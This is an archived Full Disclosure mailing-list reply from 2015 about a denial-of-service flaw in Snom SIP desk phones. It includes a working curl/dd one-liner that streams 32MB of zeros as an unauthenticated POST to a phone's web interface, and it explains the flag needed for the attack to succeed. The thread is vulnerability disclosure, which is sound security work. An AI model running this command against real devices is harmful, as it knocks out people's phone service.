[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FD] Snom SIP phones denial of service through HTTP

To: Martin Schuhmacher <broetchen25@xxxxxxx>
Subject: Re: [FD] Snom SIP phones denial of service through HTTP
From: "kapejod@xxxxxxxxxxxxxx" <kapejod@xxxxxxxxx>
Date: Tue, 13 Jan 2015 09:52:19 +0100

The latest version is 8.7.3.25.9, there is no 8.7.4.X, yet.

And yes, you missed something, (without the quotes)  " --data-binary @-"
This turns it into a HTTP POST request and uses the input from stdin.
Otherwise you just do a regular HTTP GET which gets blocked because it's
not authenticated.

On Mon, Jan 12, 2015 at 10:20 PM, Martin Schuhmacher <broetchen25@xxxxxxx>
wrote:

> Hi
>
> i just did
>
> $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
> Response: Unauthorized request
>
> did i miss anything?
>
> Firmware: snom360-SIP 8.7.4.8
> not downloadable any more for some reason?
>
> Yours
> Martin
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] Snom SIP phones denial of service through HTTP
  - From: Martin Schuhmacher

References:
- [FD] Snom SIP phones denial of service through HTTP
  - From: kapejod@xxxxxxxxxxxxxx
- Re: [FD] Snom SIP phones denial of service through HTTP
  - From: Martin Schuhmacher

Prev by Date: Re: [FD] Snom SIP phones denial of service through HTTP
Next by Date: [FD] SEC Consult SA-20150113-0 :: Multiple critical vulnerabilities in all snom desktop IP phones
Previous by thread: Re: [FD] Snom SIP phones denial of service through HTTP
Next by thread: Re: [FD] Snom SIP phones denial of service through HTTP
Index(es):
- Date
- Thread